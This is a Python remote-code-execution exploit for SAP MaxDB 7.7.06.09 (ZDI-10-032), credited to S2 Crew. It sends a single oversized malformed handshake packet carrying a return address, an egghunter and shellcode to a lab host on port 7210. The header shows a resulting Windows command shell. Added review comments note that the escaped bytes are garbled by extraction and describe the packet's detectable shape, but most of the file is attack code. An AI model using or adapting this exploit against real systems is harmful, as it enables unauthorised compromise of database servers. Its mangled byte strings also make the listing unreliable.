
# Title : SAP MaxDB Malformed Handshake Request Remote Code Execution
# Published : 2010-03-26
# Author : S2 Crew


#!/usr/bin/python

# Exploit title: SAP MaxDB Malformed Handshake Request Remote Code Execution
# Date: 2010.03.26
# Author: S2 Crew [Hungary]
# Software link: http://sap.com
# Version: 7.7.06.09
# Tested on: Windows XP SP2 EN
# CVE: ZDI-10-032
# Code:
#############################################################
# Trying 172.16.29.133...
# Connected to 172.16.29.133.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:sdbdatawrk>
#############################################################

import socket
import sys
import os

# Second-stage payload exactly as it appears in this listing. The "\x"
# escape backslashes have been lost by the page extraction, so as printed
# these are literal ASCII strings rather than the byte values the author
# wrote; the same applies to `egghunter`, `ret` and the `packet` header.
# (`sys` and `os` are imported above but never used in this script.)
sc = (
"x31xc9xdaxdaxbex94x3fxbexeaxb1x56xd9x74x24xf4"
"x5fx31x77x17x03x77x17x83xefxfcx76xcax42x02xff"
"x35xbbxd3x9fxbcx5exe2x8dxdbx2bx57x01xafx7ex54"
"xeaxfdx6axefx9ex29x9cx58x14x0cx93x59x99x90x7f"
"x99xb8x6cx82xcex1ax4cx4dx03x5bx89xb0xecx09x42"
"xbex5fxbdxe7x82x63xbcx27x89xdcxc6x42x4exa8x7c"
"x4cx9fx01x0bx06x07x29x53xb7x36xfex80x8bx71x8b"
"x72x7fx80x5dx4bx80xb2xa1x07xbfx7ax2cx56x87xbd"
"xcfx2dxf3xbdx72x35xc0xbcxa8xb0xd5x67x3ax62x3e"
"x99xefxf4xb5x95x44x73x91xb9x5bx50xa9xc6xd0x57"
"x7ex4fxa2x73x5ax0bx70x1axfbxf1xd7x23x1bx5dx87"
"x81x57x4cxdcxb3x35x19x11x89xc5xd9x3dx9axb6xeb"
"xe2x30x51x40x6ax9exa6xa7x41x66x38x56x6ax96x10"
"x9dx3exc6x0ax34x3fx8dxcaxb9xeax01x9bx15x45xe1"
"x4bxd6x35x89x81xd9x6axa9xa9x33x1dxeex67x67x4d"
"x98x85x97x63x04x03x71xe9xa4x45x29x86x06xb2xe2"
"x31x79x90x5exe9xedxacx88x2dx12x2dx9fx1dxbfx85"
"x48xd6xd3x11x68xe9xfex31xe3xd1x68xcbx9dx90x09"
"xccxb7x43xaax5fx5cx94xa5x43xcbxc3xe2xb2x02x81"
"x1execxbcxb4xe3x68x86x7dx3fx49x09x7fxb2xf5x2d"
"x6fx0axf5x69xdbxc2xa0x27xb5xa4x1ax86x6fx7exf0"
"x40xf8x07x3ax53x7ex08x17x25x9exb8xcex70xa0x74"
"x87x74xd9x69x37x7ax30x2ax47x31x19x1axc0x9cxcb"
"x1fx8dx1ex26x63xa8x9cxc3x1bx4fxbcxa1x1ex0bx7a"
"x59x52x04xefx5dxc1x25x3ax57")

# NOTE(review): the name suggests a small first-stage stub that locates the
# "T00WT00W" marker placed directly before `sc` inside `packet`; the bytes
# are garbled here in the same way as `sc` and cannot be verified from this
# listing.
egghunter = (
"x66x81xcaxffx0fx42x52x6a"
"x02x58xcdx2ex3cx05x5ax74"
"xefxb8x54x30x30x57x8bxfa"
"xafx75xeaxafx75xe7xffxe7"
)

# Author's lab target; the same address appears in the telnet transcript
# in the file header. Port 7210 is the listening service being tested.
host = "172.16.29.133"
port =  7210

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# Four bytes spliced into the handshake header below. "HC" is the author's
# own annotation and is not explained anywhere in the listing.
ret = "x08xf1xa0x00" # HC

# The single malformed handshake request. Its shape is the detection-relevant
# part: a short fixed header followed by `ret`, then a request body whose
# length is dominated by filler ("A" * 5000, "x41" * 2500 and "x90" * 2500 as
# written) wrapped around the marker, `sc` and `egghunter`. A handshake of
# this size on this port is the observable to look for on the wire; the
# vendor advisory referenced in the header (ZDI-10-032) is where the fix for
# version 7.7.06.09 is tracked.
packet = (
"x63x00x00x00x03x2fx00x00x01x00x00x00"
"xffxffxffxffx00x00x04x00x63x00x00x00"
"x00x02x4bx00x04x09x00x00x44x20x00x00"
"x00x00x00x00x00x00x00x00xffxffxffxff"
"x6dx61" + ret + "x00x00x00x00x00x00"
"x00x00x00x00x07x49" + "A"*5000 + "T00WT00W" + sc + "x41" * 2500 + egghunter + "x90"*2500)

# Fire-and-forget: nothing is read back, so the script itself cannot tell
# whether the service accepted or rejected the request.
s.send(packet)
s.close()